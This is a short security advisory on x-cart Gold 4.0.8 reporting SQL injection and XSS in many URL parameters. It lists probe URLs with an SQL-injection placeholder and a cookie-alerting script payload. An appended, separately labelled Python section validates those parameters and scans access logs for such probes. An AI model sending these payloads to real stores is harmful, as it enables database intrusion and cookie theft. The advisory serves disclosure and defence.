
Multiple vulnerabilities in x-cart Gold




SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Title: Multiple vulnerabilities in x-cart Gold 
            The program: x-cart Gold 
 The vulnerable version: 4.0.8 
               Homepage: www.x-cart.com 
 Vulnerability is found: 29.05.05 
              Has found: CENSORED / SVT / www.svt.nukleon.us 
===================================================================== 
The description.

SQL - injections
---------------
While examining the product, a set of SQL injection vulnerabilities was
found; practically every parameter is affected. The first flaw was found
in the "cat" parameter: the script performs no check on this parameter,
so passing a "'" character makes SQL injection possible. The next flaw was
found in the "productid" parameter: because special characters are not
checked, passing a "'" in this parameter produces an SQL error and the
script automatically redirects to the page reporting that error. On that
page the "id" parameter is visible; passing a "'" to it likewise makes SQL
injection possible. Next, the "mode" parameter: substituting special
characters produces an error, and SQL injection is possible. The same holds
for the "section" parameter, in which SQL injection is also possible.

XSS
---------------
XSS vulnerabilities exist in the same parameters as the SQL injection
flaws.
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
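Added example, not part of this advisory or of x-cart itself: a Python whitelist check for the parameters named above (the integer and token value shapes are assumed for illustration, x-cart's real rules are not on the page) and a scan of constructed Apache access-log lines for requests that fail it, which is how a defender would spot probes of the shape listed above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters named in the advisory, grouped by the value shape each should
# carry; the shapes are an assumption for this example, not x-cart's own rules.
INT_PARAMS = {"cat", "productid", "id", "gcid", "gcindex"}
TOKEN_PARAMS = {"mode", "section", "printable"}
TOKEN_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")
# Apache combined log line: client, identd, user, [time], "METHOD path HTTP/x", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def validate_query(url):
    """Whitelist the listed parameters of a request URL: returns (accepted,
    rejected), where accepted maps each parameter to a typed value safe to bind
    in a prepared statement or echo into HTML and rejected lists failed names."""
    accepted, rejected = {}, []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        value = values[0]  # percent-encoding such as %27 is already decoded here
        if name in INT_PARAMS:
            if value.isdigit():
                accepted[name] = int(value)
            else:
                rejected.append(name)
        elif name in TOKEN_PARAMS:
            if TOKEN_RE.match(value):
                accepted[name] = value
            else:
                rejected.append(name)
    return accepted, rejected

def find_probes(log_lines):
    """Return (client, script, rejected params) for every access-log line whose
    listed parameters carry a quote, angle bracket or other non-whitelisted
    character, the shape of the probe URLs shown in this advisory."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client, _time, path, _status = match.groups()
        _accepted, rejected = validate_query(path)
        if rejected:
            hits.append((client, urlsplit(path).path, sorted(rejected)))
    return hits

# Constructed sample log lines for this example, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/May/2005:10:00:00 +0000] "GET /home.php?cat=12 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [29/May/2005:10:00:03 +0000] "GET /product.php?productid=%27 HTTP/1.1" 500 312',
    '10.0.0.7 - - [29/May/2005:10:00:09 +0000] "GET /help.php?section=%27%3E%3Cscript%3E HTTP/1.1" 200 4010',
]
```

Running `find_probes(SAMPLE_LOG)` flags the second and third lines; the 500 status on the productid probe is the SQL error the advisory describes and is worth alerting on by itself.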
=====================================================================


The conclusion.
^^^^^^^^^^^
Testing was done only on version 4.0.8; other versions may also be
vulnerable. The vendor has been notified. If you have any remarks, write
to censored@xxxxxxx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |